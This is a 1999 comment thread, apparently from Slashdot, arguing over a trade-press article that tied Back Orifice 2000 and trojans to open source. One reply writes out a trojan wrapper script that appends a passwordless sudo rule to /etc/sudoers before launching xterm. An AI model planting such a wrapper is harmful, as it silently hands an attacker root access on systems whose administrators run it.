Open Source Concerns: Trojan Horses In the Code

crisco writes to us with an article from InternetWeek addressing the concern of "trojan horse programs concealed inside open source code that could create new security headaches for IT managers", as the article says. The article deals mainly with the BO2K issue, which makes the whole open source connection a bit of a stretch.

Issue with retail software also

This is not a problem with Open-Source software. It's a problem with all software. There was a front page article in Sunday's USA Today about Y2K consultatns doing the same thing. They had nailed 2 or 3 companies putting back doors and other such trojans in the software they updated for Y2K.

Who knows how many time this has been done. Blizzard did it. There's rumours MS does it. Hell I wouldn't doubt it if every company did it.

Security through Obscurity

If this "methodology" ever had any credence,
surely it's gone now. Time to put the journos
on the clue train.

Steve

Internet Week Crack Whore Tech Writers

I picked up a copy of Internet Week in an airport once and found it filled with clueless tripe, inaccurate articles and generally piss poor reporting. I suspect the rag is an advertising venue only.

This article reflects that. I suspect it's just there for the banner ads. They'll be happy that they made /. and the resulting surge of readers will boost their ad revnue for this writer.

In this confused writer's mind, Back Orifice is an Open Source program, so all open source programs must have at least a possibility of containing a trojan horse. The reporter does not seem to realize that peer review would reveal any such problem almost immediately. This has, in fact, happened when FTP sites or developer security was compromised. At least with Open Source programs you can go look if you want to.

What you should REALLY fear is trojan horses in closed source programs. Recent IP proposals would allow a software company to revoke your license to their software over the Internet. Are your sure your software company hasn't already installed back doors to do that? One of the old service providers' software (AOL or Prodigy, I think) used to catalog your entire disk and send the information back to the provider. Microsoft covertly assigns a user ID to you when you register their software over the internet. I view those as trojans, just as dangerous as anything on any of the script kiddy sites. They only stopped because they got caught but we don't know for certain that there are other evils lurking in the bowels of Windows or your software apps.

I wish this article had an E-Mail address associated with it so that I could write and express contempt at the writer there, but I guess I'll just have to settle for doing it here.

Re:Internet Week Crack Whore Tech Writers

The provider was MSN, I think. Yep, our good ol' friend...

Re:Internet Week Crack Whore Tech Writers

No, it was Prodigy.

Yeah whatever...

"They didn't have to write code and release it to the public,"

Yeah right... if they would have just told Microsoft about the problems I'm sure Microsoft would have fixed it right away... ;)

In any case, I don't want NT fixed... I want it to be just like it is... that way we can hack it as often as we want to...

Re:FUD

I can't believe this clown got a point for being "Insightful".

Having open peer review is no guarantee that there won't be trojan horses in the program. Ken Thompson wrote an essay (there used to be a link from ACM, but it's gone now) where he described how you can compile code in the binary that gets propogated from release to release. That code can easily be a trojan horse, and what's even more insidious, is that it never shows up in the source.

Think about that the next time you use gcc.

I they mean viruses that are Open Source..

I was a little shady of the author to combine the words "Open Source" with "Viruses." I think he was trying to imply what we all took it to mean. But I think what he really meant was that virus authors who share their source code with the world make it easier for the world to write more viruses.

Of course the simple solution is that if you don't want viruses...
DON'T USE AN OPERATING SYSTEM THAT SUPPORTS VIRUSES!
(you know which ones I mean..)

Re:I they mean viruses that are Open Source..

[bliss]

I think linux is the best platform in that respect. I used to be real big into figuring all sorts of assembly programming out and the best source to find about how to code assembly is to look at some viruses first. A large ammount of the code is avaible. What made this so dangerous for (and still does) microsoft operating systems is that they rely on specific dos operating system calls that have been around for quite some time. This has given people a better than passing familarity with the api's necessary to create viruses.

Who's at fault?

Let's see...according to this article, the macro virus has been around since 1996. It is now 1999 (three years, an eternity in the computer industry) and Microsoft still has done nothing to fix the vulnerability in their software.

I am not condoning the action of virus makers, but I can see how tempting it is to shoot at a target that isn't moving. Perhaps instead of whining about how the same virus is being re-written over and over again these people should be giving Microsoft a tongue lashing for not solving the problem.

Open Source is not the problem. Failing to fix gaping security holes in software is.

Open Horse Software

The wave of the future!

Re:Open Horse Software

Open HORSE Software

Beware of GEEKS bearing GIFs!

Re:FUD

What about someone who buts a backdoor into something (say Linux)then distributes it throughout the world. Sure all the l33t programmers out there will catch it...But I read somewhere that there are 2, possibly 3 people on the planet who use computers that couldn't read code if their lives depended on it.
Well, I guess it's their own fault. They had the chance.

Re:Why Bother?

You know, and I know that this article is poorly researched and misinforming. Unfortunately, there are the other 95% of the world who don't know this. They will take it at face value. Without proper education (I know I sound like a missionary), the other 95% will hear the buzz words: "open source" connected with "hacker". This is a bad thing.

Discussing it does much the same thing that open souce does: By everyone reviewing it you get all the good and bad points examined and anyone who looks at it later will be able to see both, hopefully then able to write something better next time.

Without the public behind something, it quickly dies off.

Re:That is the point!

You don't even have to modify the binary.
often a simple wrapper will do the job just fine.
---
echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
xterm.real "$*"
---
might do the job... (ignore my faults... it would work if done correctly, won't it?)
you can check if the user is root, when it's done automatically remove the wrapper and so on.

Root should never execute a program writeable by normal users. (and if youre afraid: don't execute a program writeable by any other user expect root - you have to trust him anyway *g*)

Ken Thompson and the C compiler...

IIRC, Ken talked about a C compiler that was infected with the backdoor. Everytime the compiler code was compiled by itself, the compiler detected it and inserted the virus automagickally.

All in all, it's a better argument against the dangers of having a single compiler...

Re:Ken Thompson and the C compiler...

[12dec0de]

Just for the sake of completeness:

It was an in an KeyNote to some ACM Symposium that K.T. spillt his most notorious hack.

Unfortunately the ASM has stopped putting links of these classic speeches and docs and their site.
(I allways find Dijkstras 'gotos considered harmfull' hilarious. The man is so narrow minded B-), but I digress)

What K.T. hat done was to put code in the compile (cc) that a) reinserted itself even if removed from the source code, and b) created a backdoor in the login code when compiled with such compiler, so that (dough, forgot K.T.s fav. login) was on a system even if it was not in the /etc/passwd, including his normal password, so not everybody could come and try the backdoor.

Before I read this I thought all those backdoor stories in Heinlein books or Gibsons Stuff where just urban Myth. But it is real my man.

mfg 12dec0de

Re:FUD

In a perfect world....yes. But what about a guy who wants to pull a huge scam. Start a reputable business installing Linux networks (with his backdoor in) specializing in e-commerce sites. In this industry it takes a year or two to build up a good reputation. Then...Burn everyone.
And before you say that no respectable programmer would do that...I am aware of that. I am not talking about them. I am talking about the career crook who is looking for the next big scam. That would be an excellent one.

Re:So.... what's your point?

Laws?????? I didn't agree to any of THEIR laws. I thought there was a law against police brutality. I think about that everytime I visit my fathers grave.

Already Happened!

Already happened, the situation you describe rather adequately depicts a well-known redmond-based software house.

One of their 'back doors' was the messages broadcast with their word processor, which led the the recent arrest of a macro-virus author.

And just looking for such back-doors is a violation of the EULA, which prohibits reverse engineering.

Don't be surprised of the CEO of said company (or some other programmers) has some back-door login account built in for every version of the (supposedly) network-based OS. In fact, it is known that some wartime vessels operate with this software. Just suppose what this CEO can do then!

Therein lies the beauty of open source. You can check for such trojan horses.

Re:The real Trojan Horse

Ummm... I'm betting you've never read the story about the Trojan Horse, since you've got it all wrong.

I'll even give you one point if you can name the work in which the story is told.

Re:possibly misinterpreted

That's just why you don't run anything as root unless absolutely necessary. And make sure to use full path names. This is most especially applicable to new users that don't know this, and it should be emphasized greatly!!

But it is much easier to get someone to click on an email link than to convince someone to su to root and execute a script (unless they're already in root to begin with, in which case getting their computer being wiped out once would teach them not to be stupid again).

Re:What they really mean...

Yes, NT is DoD secure ... until you connect it to a network. That is the meaning of the DoD security classification NT has.

Aegis

... Is a GPL revision control system which avoids the possibility of someone slipping a backdoor or trojan into an application.

It can be configured to disallow any unreviewed code making it into the release. It operates at a much higher level than foile-bashers like RCS, CVS or bitkeeper - none of these get anywhere near thinking about security.

Check it out: http://www.pcug.org.au/~millerp/aegis.html

Re:Where to begin...

VIRII is not a word. It's script-kiddie pseudo-techno-babble. May Caesar haunt you this eve! Use viruses, or learn Latin.





It's very embarrassing to see grown men blathering gahgah googoo and think they're smart.

two morals to the story

First don't use closed source programs which you cannot patch.
Second don't use software from a very powerful company which won't pay any attention to its software.

sorry I disagree on some of this

Any system on a network can be backdoored. BO2K isn't a vulnerability in Windows. You need a vulnerability to get it installed in the first place (unless you own the box).

Saying BO2K is a problem in Windows NT is like saying that Un*x systems are insecure just because if I have root access I can make them vulnerable and remotely controllable. Sorta obvious, isn't it?

- Speed

yeah but...

The whole BO2K issue assumes someone got into the box already.

Now if I had root access to your Linux box, it would be -easy- to hide backdoors. Heck how do you know I didn't replace one of your standard daemons with another executable?

That's why anytime you have root hacked on a machine, you need to take it off the network, mount the drive on another machine for analysis and get the info you need about the attack. And promptly format and reinstall your OS when you are ready to put the machine back into service.

This goes for ANY OS, not just Linux, and not just Windows.

Respectabe trojans

Today, most commercial closed source software, especially Windows software for home users, includes trojans. These trojans take many forms:

1. Changes to the registry to connect unknowing users to sites of software manufacturers and others whenever they are online, or at periodic intervals. These trojans are not usually added to the Windows "Startup Group" but instead are hidden in the registry in the run, run once and run services sections.

Most Windows users don't even know how to remove links from the start menu, much less remove hidden tripwires from the registry.

Almost all major commercial software companies developing for Windows use this tactic. Sometimes email is sent to "register" software the user has already paid for and to order more software, without any control over the sending of such email.

2. Hidden id's extracted from user's machines or profiles are inserted into data saved by a manufacturer's software. Thereby, data is identified by machine or user without the user's knowledge. (Example, Microsoft's use of GUIDs to brank Office-created data.)

3. Changes made during installation (usually from a binary install.exe or setup.exe) to file associations (mime-types) that often result in the newly installed program taking over the role of a previously installed program in handling one or more data types. Often software manufactures fail to notify users that these changes are being made, but usually they do. That's nice of them.

4. During "active-updates" from the internet the user's machine is usually locked. The user cannot access any other programs or use the mouse or keyboard. Of course anyone using an active update does so at great risk, especially active updates from "Trusted" sites like AOL and MS. Denial of service, anyone?

Installation these trojans (hidden programs installed without the user's knowledge or permission that act or initiate themselves with little or no control from the user) is a criminal offense.

Why are these commercial companies like Microsoft, AOL, Netscape, Lotus, etc., etc., etc., not prosecuted? They are altering or damaging an individuals property without his permission and usually without his knowledge. An individual who does the same faces criminal prosecution and harrassment by the FBI.

These companies are criminal organizations. Compared to these practices, what are non-competitive practices and dirty tricks played on competitors? These are assaults on the private property and privacy of users - users who have paid good money for products which they have a right to assume will not do things to their computers during installation and later without their knowledge or permission.

Executives of these organizations are racketeers - and should do hard time in Federal prison along with drug kingpins, child pornographers, and street criminals. This is not a matter of interpretation, but fact. Nothing could be more simple and all of this is easy to prove and well known to anyone who has installed Windows software and knows a little about what is going on behind the scenes.

Even if these people never go to jail, they will pay. You don't get away with that - there is a special place in hell for these people. May they stay there until they see the error of their ways.
Of course, federal prosecutors who go after little guys who write trojans and viruses but who pretend that the corporations don't do the same things won't even have it that good. May they rot in hell forever.

moron journalists

Whoever wrote this article has probably been waiting weeks to use the term 'open source' in an article. He's an idiot. (maybe he's Al Gore).

the final death of NT?

I wonder if anybody ever tought the possibility of a variant of BO2K which has two components, which esentially are a system of auto spawning.

one little client, and another bigger client which can act like a micro server. both of them interact to exchange data for more entry and replications.

the sole purpose of this system is to auto-replicate to each NT machine within a network, while at the same time giving a cracker a backdoor to change the inter-program comm. mode, hence semi automatic mutation.

so far, virii can only infect from machine to machine, through network, but I don't believe one invent virus-system, one where it interacts between virii to spread itself, a network virus.

(melisa is a prototype of semi intelligent network virus, altought I don't believe the author intended as such)

You've got a point

something like playing Doom or Quake in god mode

Re:Ken Thompson/C compiler/backdoor

Where I come from, that's called a virus. Pretty slick one, but it's still a virus.

Re:Missing the point of BO2K

I have to run a branch office with over a hundred systems spread through a large building. Fortunately, I don't have to admin anything outside the building. (the co I work for has about 500 or so systems at its headquarters, 100 miles away.) I want anti-virus software to allow BO on the system, but only MY copy of it. The garbage about BO just being a trojan is ridiculous.

BO and Trojaning

BO comes with a program that lets you put it into another program as a Trojan. Makes it easier to hose someone with a program that suppose to do something else.

But just becuz BO can be delivered with a Trojan, doesnt make it automatically bad. Matter of fact, I think MS should include it as a standard piece of Windows*. But with proper security. (if they are capable of it. MS would probably fuck up and leave a bugg^H^Hffer overflow in the code somewhere)

Re:Why Bother?

>will hear the buzz words: "open source" connected
>with "hacker". This is a bad thing.

Sometimes you just don't know whether crying or laughing would be the most appropriate thing to do..

Re:So.... what's your point?

Proprietory software - you have no option but to trust the programmers. You can't say "Oi, I wanna see your code".

Worse still, you're tied in to that software, so if the company go broke, you're as good as fxxked.

Won't happen

Before using such tactics, you have to think about the backlash if you get caught at it. Trojans and other security flaws in open source software get caught very quickly and the community would notice if a patteren started to develop. If a path was traced back to Microsoft, the ensuing backlash would make the DOJ Trial look like a nice family picnic. Among other things, they'd be opening themselves for major law suits and possibly even criminal proceedings. I doubt MS wants to take that risk (I don't doubt they're unethical enough to do it though, if they thought they could get away with it.)

Man, not a lot of classicists here!

Ok, a quick summary:

Helen was the wife of Menelaus, king of Lacedaemon (AKA Sparta), one of the Greek leaders. She was reputed to be the most beautiful woman in the world. Paris was a prince of Troy, located across the Aegean Sea from Greece in what is now known as Turkey. Because he judged Aphrodite to be the most beautiful goddess, Paris was granted a wish, and he asked to have Helen as his wife. The Greeks were outraged at this "theft", so they gathered a massive army and sailed to Troy to get her back. (So Helen is known to have "a face that launched 1,000 ships).

The Greeks and Trojans fought for 10 years before the gates of Troy and many heroes were killed, including Hector (the mightiest Trojan warrior) and the incomparable Achilles (who would have loved Quake - read the Iliad - after his friend Patroclus was killed, he slaughtered the Trojans by the hundreds). Achilles was killed by a cowardly arrow in the heel, the only spot left vulnerable when his goddess-mother Thetis dipped him in the river to make him invincible.

Since the Greeks couldn't take Troy by force, Odysseus devised the great horse as a ploy. The Trojans foolishly brought it into the city, after which the Greeks came out, killed whatever resistance they met, and opened the city gates to let the rest of the army in.

Although most people associate the Iliad with the Trojan war, the Trojan horse never appears in the Iliad - it ends with the funeral of Patroclus. The Aeneid, by Virgil, tells the story of the Trojan Horse and the sack of Troy. The Aeneid puts forth the hypothesis that Rome was founded by Trojan refugees after the fall of Troy.

Re:Man, not a lot of classicists here!

[Danse]

Achilles was killed by a cowardly arrow in the heel,

What's cowardly about that? Jeez... if it's the only spot that'll do the trick, I'd say it was a pretty darn smart arrow. Doesn't seem like Achilles was all that brave himself. Charging into battle isn't such a big deal when you're invincible.

Wrong, wrong, wrong

I have this article on my desk. The only link to open source is that Viruses are now open source, i.e. the Virus creators distribute the source code to their viruses. This allows other people to modify the virus and spread variants of it too. That was the whole open source idea of viruses. They also site that this makes Word macro viruses devistating. At my work I've found macro viruses with comments in the code! Open source programming let's everyone see a virus or an exploit and that is why it is good. Take for example mIRC scripts of yore where the programmer would leave a back door to get ops or steal files. Everyone would find it and it would die quickly. This is what open source is about. We don't know if the government is going to settle with microsoft secretly by saying, "You put in this code so we can read data off of all Windows machines or we will put you out of buissiness!" If that were the case, we would never know. Might even explain the Intel processor ID problem we had for a while. Open source good, closed source bad!

Calm thyself, language zealot

Virii may not be the Caesar's Latin, as it were, but it's certainly not script-kiddie pseudo-techno-babble. To the contrary,
virus :: virii
is in the same spirit of hackish wordplay that gives us plurals like
Unix :: Unices, and
VAX :: VAXen.
I don't know if it's actually in the Jargon File, but it's hardly kiddie-speak. We don't do away with words like hackage and bogosity just because they're not in the dictionary! :-)

AC

FUD

What? open source programs are LESS likely to have trojans, right? If you follow common sense logic, any code that is open to review by peers is less likely to have any trojans/bugs, etc.

FUD, nothing more.

Re:FUD

[bliss]

Well I always check my logs and I don't have any unmentioned entried :). However I can conceede that point to you anything is possible. I just think associating problems in a movement with the movement itself is a really bad idea in general. This is just an attempt to make crackers=open source=linux hackers/enthuasiasts in general to make the movement loose power.

Re:FUD

[Nodatadj]

Just like they did with Nettools was it?

And what happened? Within a few hours the ftp site with the trojaned code was taken offline. Out of all those "l33t" coders at least one isn't going to think "hey, there's a nasty trojan in this, I'll comment it out and not tell anyone else ". No, they're going to spread the word, and it'll be all over the place, and no-one will use it.

Open Source

[whoop]

I liked the comment by "a security manager at a top financial services company who requested anonymity" (meaning, he was made up :) ), that it "allows an army of hackers to leverage" the program for their own purposes.

For what it's worth, if the OS being "attacked" is open source, there are even larger of number of people ready to close up holes and what-not within a few hours, days at most. As Jason Garms is quoted, "There's nothing wrong with [Microsoft] systems until Back Orifice is installed." NT is perfect, therefore there will never be any fixes. BO2k will just be labeled a virus/trojan and to most people, that's considered sufficient protection.

Re:su

[whoop]

If su lets you do destructive things, then that better be flagged as a trojan horse too. ;)

Where to begin...

[J4]

Trojan horse programs concealed inside open source code could create new security headaches for IT managers. One such program released last week, BackOrifice 2000...

BO2k isn't concealed inside another program..

When virus writers moved to an open source model in 1996, there was an explosion in macro viruses,...

Ah yes, I remember the good old days of proprietary virii...NOT.
The explosion in macro virii wouldn't have anything to do with a program that
could _host_ them now, would it?
Like, I don't know, maybe MS Office?
No mention of how much easier it is to construct
a macro virus as opposed to a real virus done in, say, x86 assembler.

Organizations "absolutely should be putting
security measures in place if they use NT to a
great degree" to thwart BO2K-specific attacks,
said Drew Williams, director of Axent Technologies'
SWAT Team.

Hmm, not quite sure what to say about this one...
Are they saying:
A)You don't need security if you don't use NT
B)You shouldn't use NT (I'll buy that)
C)If you only have one NT box you don't have to worry
D)Win9x, 3.1 aren't vulnerable

Internet Security Systems researchers have
already decoded BO2K protocols and encryption
algorithms.

Nice trick...somebody must have sent them the source
code in an encrypted email, yeah, thats
the ticket...

Jason Garms, product manager for NT security at
Microsoft, said the company will fix any known
security vulnerabilities in its operating
systems. "There's nothing wrong with [Microsoft]
systems until Back Orifice is installed.

Oh my.... Somebody should start
a 12 step group for folks like this
I detect some serious denial problems here.
How much are these fixes going to cost?
When can we expect delivery?
Thats what I thought...

Users on NT networks that
exchange files and use Internet chat systems
are at the highest risk....

So..don't use your network to
transfer files..just look at the pretty lights....

The elite hacker group is banking on tools
such as BO2K to eventually force Microsoft
to correct security weaknesses in its operating
systems.
Security experts don't see the logic.
"They didn't have to write code and
release it to the public," said ICSA's Thompson.

The bastards, how _dare_ they try
to push around Micros~1!
Who's the real victim here? Micros~1
or the "Security Experts" who have to get
off their well padded rear ends and do some work now?
Oh wait, I guess security expert is a synonym for pundit now.

Once the program is released,
Axent's Williams expects an "immediate
spike" in hacking activity
on NT systems, but expects it to trickle down to
some level of manageability.

The program is already released, Sparky...
I expect this is true if we use hacking in the
proper sense as in "Micros~1 programmers fixing
things up a bit"..
Though I expect if you replace "hack" with "kludge"
it'd be a little more accurate

Now _this_ is the kind of story I expect to see on /...
Just like backinaday ;P

Re:Where to begin...

[Larry+L]

>BO2k isn't concealed inside another program..
I heard it can be. You can deliver it with
an installer.

But in the virus sense of "concealed within", you're right

Re:possibly misinterpreted

[Trepidity]

I found that humorous as well. Macro virus authors didn't "choose" an open source development model. Their source is available because it's in a macro, so the source has to be available. It's like saying that DOS .bat script writers have switched to open source, or that bash shell script writers have switched to open source, as if they had a choice.

NT or BO2K's fault?

[echo]

Could someone with more knowledge of Windows NT please explain something to me...

How does a process "hide" in NT? Is this a "feature" of NT? Is it an undocumented feature? Or it BO2K using an exploit to do this?

If you run BO2K as a regular user, isn't it limited to that user's rights, just like in unix? If not, how does BO2K gain superuser access?

Is this really Microsoft's fault? Or is BO2K not as harmful as everyone makes it out to be?

Re:NT or BO2K's fault?

[FunOne]

If you can, try and find a copy of the Defcon vid feed of the release of BO2k. It spawns a remote thread on the explorer.exe process then copies itself over. This gives it super user access on the machine. Since it is now just a process on explorer.exe, it doesn't show up in 'normal' user tools. Although developer tools would (That show both process & threads).

FunOne

Re:NT or BO2K's fault?

[CJ+Hooknose]

How does a process "hide" in NT? Is this a "feature" of NT?

Not sure how something could really hide, but a process tried to do that on me just yesterday. Surfed a bit with Netscape on NT, then closed that program. A bit later, I noticed that M$ Word was running even more slowly than it usually does. Same thing with my terminal window and the RC5 client.

NT's Task Mangler showed only 3 tasks running--Telnet, RC5, and Word. Looking at the process list, though, showed that Netscape was A) still hanging around B) burning 90% of the CPU time. Hmmm.

I'm pretty sure this wasn't supposed to happen, but it did. It would never fool a wise sysadmin, of course, but could squeak by someone who wasn't paying attention. I (think/hope) BO2K is more sophisticated in its hiding.

Oh my...

[pigeon]

.. these kind of tools, like bo2k have the potential to harm windows 2k very much.. to wipe it out of the marketplace.. to even destroy microsoft.. that would be terrible! That would be tragic!

La. La. La la la.

uhh. what's the POINT here?

[mackga]

The fact that NT is a crackers wet dream come true is somewhat glossed over here. I mean, this quote from the MS camp is really great:

"Jason Garms, product manager for NT security at Microsoft, said the company will fix any known security vulnerabilities in its operating systems. "There's nothing wrong with [Microsoft] systems until Back Orifice is installed.In reality, [cDc] has produced code with malicious intent that targets users, not technology," (bolding mine)

Uh, yeah, right, so the BO stuff gets installed on users now, does it?

What bothers me is the subtle dig here at OSS development, really missing the point that if the target TECHNOLOGY wasn't so friggin full of holes, then there would be a lot fewer exploits - either in binary or open source form.

The article could have been a lot more honest by stating: "yeah, open source 'sploits make it a bit easier to mutate the buggers, but, hey, if MS wrote decent client and server software, we wouldn't be having this discussion."

Re:The real Trojan Horse

[mackga]

Uh, not to get all pedantic on you, but the Greeks built the Trojan horse - inspired by Odysseus - because the horse was sacred to the Trojans - who they were fighting. The Greeks left the horse outside the walls of Troy. The Trojans brought it inside with great fanfare - the dummies - and that night the Greeks inside the horse jumped out, opended the gates, and let the rest of the Greek coalition in and slaughtered just about everyone. Beware of Greeks bearing gifts!:)

Re:So.... what's your point?

[McKing]

So all cops get slammed for your poor dead father?

If that really happened, then I'm sorry your family was the victim of some bad cops.

We're dealing with people here, and some of them are bad. Some are very good, but most are somewhere in between.

If the cops got caught and prosecuted and sentenced, then the law _was_ followed.



I'm sick of hearing all cops get maligned for the actions of a few bad apples!!

my response

[McKing]

Here is a copy of my response that I sent to their feedback address:

------------------------------------------------

This e-mail is in response to your online article dated July 19, 1999 entitled "Hackers Kick Open Back Door To NT". I (like many others, I presume) take exception to the way the article associates the CRACKER (cracker, not hacker, you idiots!!) community with the Open Source / Free Software community. The dangerous connections that you have made that "the Back Orifice programs are bad" and "the Back Orifice programs have the source available" leads the uninformed to believe that all open-sourced software could contain trojan horses or other viruses. In your very own article you state that the server part of the program is spread through an e-mail attachment, therefore the software responsible for delivering and allowing the release of the trojan horse is a very proprietary closed-source product.....Microsoft Outlook!!! (just as in the case of the melissa virus)

In case you were not aware, the cracker community has almost _always_ made the source code to their viruses, trojan horses, password crackers, port scanners, and other software available to other crackers. This way the other crackers can use them. The cracker community existed long before there was a Free Software community. The Free Software community is about spreading ideas and information about computing and programming to take advantage of the massive pool of talented HACKERS (programmers) available worldwide. I hesitate to use the term hackers, since even you people in the _technical_ media obviously still haven't grasped the distinction between hackers and crackers. Crackers are about breaking into phone and computer systems for fun and profit.

If your intent was to write an article about the possible problems with the proliferation of the BackOrifice2000 program, then you have failed miserably. It is obvious that you do not understand the problems yourself. You do not make a point of the fact that if Outlook and Word did not have such a poor excuse for security, then the program could not be spread as easily. You also do not understand the motivations of people like the cDc, who have decided that since MS will not fix the _very_ long-standing bugs in all of their windows operating systems and applications, then cDc will use them to create a program that does essentially what "PC Anywhere" does (without the large amount of money and signed NDA's Symantec had to give to receive the information to write PC Anywhere). If I attach a self-installable, pre configured copy of PC Anywhere to an email to someone, and use it to own their machine, should Symantec be sued for writing it? cDc and other "white-hat" cracking groups have made it clear for a long time that they are trying to warn MS about these security holes so THAT THEY WILL BE FIXED. MS has shown that unless widely publicized outrage at a security bug occurs (like the melissa virus), then all but the most serious bugs and holes either go unfixed for a long time (until the next service pack or so) or they just do not get fixed, ever!!

Re:Serious mis-interpretation going one here

[McKing]

Sorry, Bruce, but that is what the article says to you and I.

What it says to 'Clueless Joe' IT Manager who has never used anything else except MS products is that since this "horrible" program that he heard about on this "trustworthy" technical web site is open sourced, then all programs and projects associated with the current buzzword "Open Source" must be bad and he should never allow them into his domain.

It also preys upon their fears that there are armies of rabid "hackers" (/me shudders at the misuse) out there, like in the movies, who are just waiting to jump across the internet and own his boxes.

I agree that BO is an attempt to force MS to deal with their holes, but rather than interviewing cDc about it and finding their side of the story, the writer just let some "experts" blather on.

The whole idea that BO would now evolve into millions of strains that would keep Anti-Virus detection companies working 24x7 to fight them is even more sensational, so that was made the focus of the article.

See my response to the article in another post.

They do make a good argument...

[Danse]

I'd almost like to see this one go to court. After Microsoft somehow managed to win the Bristol case (I still can't understand how the jury came to that conclusion), It'd make me feel better to see them get themselves into another case where they'll end up looking stupid. cDc makes a pretty good argument on their website. It's amazing the lengths MS will go to to avoid having to admit that their programs have bugs.

So.... what's your point?

[Danse]

He did a bad thing. He should be arrested and barbecued for his blatant attempt to take that which most definitely did not belong to him. What's to stop someone from doing the same thing with proprietary software? They hire a bunch of programmers and make a real product. After a year or two, people trust them. Then he goes and sticks in his little back door and nobody knows about it... not even his own programmers. This is why we have laws. It has nothing to do with open/closed source. It has to do with malicious intent.

Re:That is the point!

[/dev/niall]

KrAphtd1nN3r wrote:
Besides, unless the sysadmin is very crappy, users should never be allowed to write to code files.

My cheesy little friend, do you really think that everybody developing on *NIX boxen has root access?

Nope, they don't. And you need access to system header files to do anything of consequence.

Unless, of course, your company is preparing for the release of "Hello, World! 2000". ;)

How Silly

[mholve]

How ya gonna hide trojan horses in stuff when you have the source code? I suppose one could download binary-only versions, but that's YOUR fault and not that of Open Source.

Re:possibly misinterpreted (virii)

[krynos]

I remember in 1994 reading the 40Hex and NuKE Info Journal that had source code to virus, sometimes only the binary or disassembled and commented source (from binaries). Having virus and trojan source code is nothing new (40Hex and NIJ did exist a while before I had a net access)

I still wonder what hapenned to them.

Interrestingly, the viruses where very often using undocumented functions in MS-DOS (and not only the InDos flag), some where really incredible.

Dangerous conclusion

[Rene+S.+Hollan]

... actually, if open source development leads to faster production of "bad things", then clearly it must be regulated, in the same way hand guns, drugs, booze, and auto licenses are. Only the "responsible" few should be allowed to code openly.

Think it can't happen?

Re:Dangerous conclusion

[chromatic]

Look at all of the irresponsible closed source software out there, heh heh.

--
QDMerge -- data + templates = documents.

Re:Dangerous conclusion

[Godin]

along that same line of thinking, though, regulation wouldn't do anything except stop the law abiding citizens from coding. the ones that are coding viruses and trojans (while I understnd coding them isn't illegal) would still fall outside of legality and the law wouldnt affect them in the least. If criminals obtain handguns/drugs/licences illegally, then more laws/regulatoins are not going to stop them, only make them more creative.

>"Cynic?? Who's a cynic?"

Re:possibly misinterpreted

[Gregg+M]

When virus writers moved to an open source model in 1996, there was an explosion in macro viruses,

Excuse me ?? Macro Viruses? Wasn't it Microsofts own macro language that resulted in the rise of Macro Viruses. Open source had nothing to do with it. Damm read that line again what a load of Bullsh#t!

If you go to the BO2k website you'll see that Microsoft uses the STEALTH feature in their own product.

www.cultdeadcow.com/news/pr19990719.html

SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical
stealth feature. As a matter of fact, they explain this feature in a Word document available
from the Microsoft website:

Re:there already is!

[Improv]

Some code is obscure even being in clear sight.
Consider Linux or Mozilla -- their source trees
are huge, and if one were particularly untrusting,
one might think that it would be easy for such
groups to accidentally or purposefully stick code
in that could be problematic WRT security. The
trust that can be applied to small projects WRT
security can't neccesarily be given to larger
projects, as the chance of someone, or even everyone collectively,
looking at the problematic section(s) and knowing
enough to recognize a security problem isn't
particularly inspiring. OTOH, it certainly beats
binary distributions :)

Re:there already is!

[Improv]

I'm not claiming that, although some people might.
But on a practical level, things submitted by
people from outside with ill intent or lack of
a clue could cause security issues, and it seems
that even with a reviewer, some bad code will
quite possibly get in.

Verification group?

[Improv]

It would be interesting and useful to make an OSS
verification group which would audit open source
projects for security problems (intentional or no),
determine what platforms the source compiles on,
look for bugs, and ideally submit patches back to
authors and possibly sell support and/or legal
liability for program failings.

Re:Verification group?

[dkusters]

A verification group for OSS is a large order. There are several smaller groups working on different code bases. One of the more thorough would probably be the OpenBSD group (http://www.openbsd.org/). They constantly scour their source base (originally forked off of another *BSD group) for security problems. Due to the deligent efforts of the OpenBSD group, their operating system can be quite justifiably touted as the most secure standard operating system that is somewhat widely used.

Re:Verification group?

[linuxci]

There's a project called the Linux Security Audit. They were talking about it at the UKUUG Linux '99 Conference nad basically they do what you say - go through open source software contained in Linux distributions and look for security holes.

I can't remember their URL so if anyone does have any info on them post it here.
--

Re:Verification group?

[Godin]

The mere thought of a verification group lends to the increase of corruption.

It is a noble sounding idea, but if you establish a few elite coders as the last line of defense, what happens when some hacker decides to put one of the forum on his payroll. Then every application he/she reviews may, or may not hide a trojan, or virus. then the unsuspecting public (unsuspecting because they were willing to trust their digital safety to a stranger) is suddenly surprised by some bonehead running off with millions of dollars and the secret files of our most hidden desires...

every crooked politician who has ever changed their stance based on lobbyist funding is testimony to this...

>"Cynic?? Whos a cynic??

Re:Missing the point of BO2K

[Sneakums]

Well, I just sent this to McAfee on their feedback form after I read their BO2K page (http://www.mcafee.com/viruses/bo2000/what_bo2k_do es.asp):

--BEGIN--

In a number of places on your page about BO2K, you refer to it as a "virus" and a "trojan".

BO2K is neither of these. Virus spread themselves; BO2K does not. Torjan horses pretend to be something they are not; BO2K does not.

Back Orifice 2000's website (http://www.bo2k.com) makes no bones about what it is: it is a remote administration program. It hides from the taklist to stop clueless users from removing it, and then only on 95/98. On NT, it is visible in the task list running as a service.

You refer to the original Back Orifice being "discovered" on October 15 1998... The software was announced with a press release on July 21 1998. Where's the discovery in that?

Back Orifice 2000 is a tool that allows the installer to control a machine remotely. It is no different in function from pcAnywhere or other such tools. As a side effect, it demonstrates the woeful security present in Microsoft's operating systems.

Personally, I find your characterisation of BackOrifice 2000 offensive and sensationalistic. Sensationalising the possible effects of the tool is one thing, but sensationalising its essential nature is another thing entirely.

Yours,

Paul Collins.

--END--

Yes, I have seen the typos ;-)

------------p!

possibly misinterpreted

[pridkett]

I think that you might have misinterpreted what this article is about. It is merely an article about Bo2k and how the fact that IS open source will cause problems for people. Meanwhile, it eludes the somewhat minor problem of people writing patches for legitimate software that turns in into trojan like software.

However I did glean a few bits of interesting stuff. Mainly that Microsoft is saying that if its a real remote admin tool that it wouldn't hide from the administrator. Umm, excuse me, I have the displeasure of having an NT server box here at work that I'm pseudo responsible for and NT Server Manager hides.

Secondly it doesn't mention the fact that if NT were written worth a damn, then it wouldn't be POSSIBLE to do this sort of stuff to it. There was the comment about it preying on users and not administrators, which is partially true, but its really MSs fault in the first place.

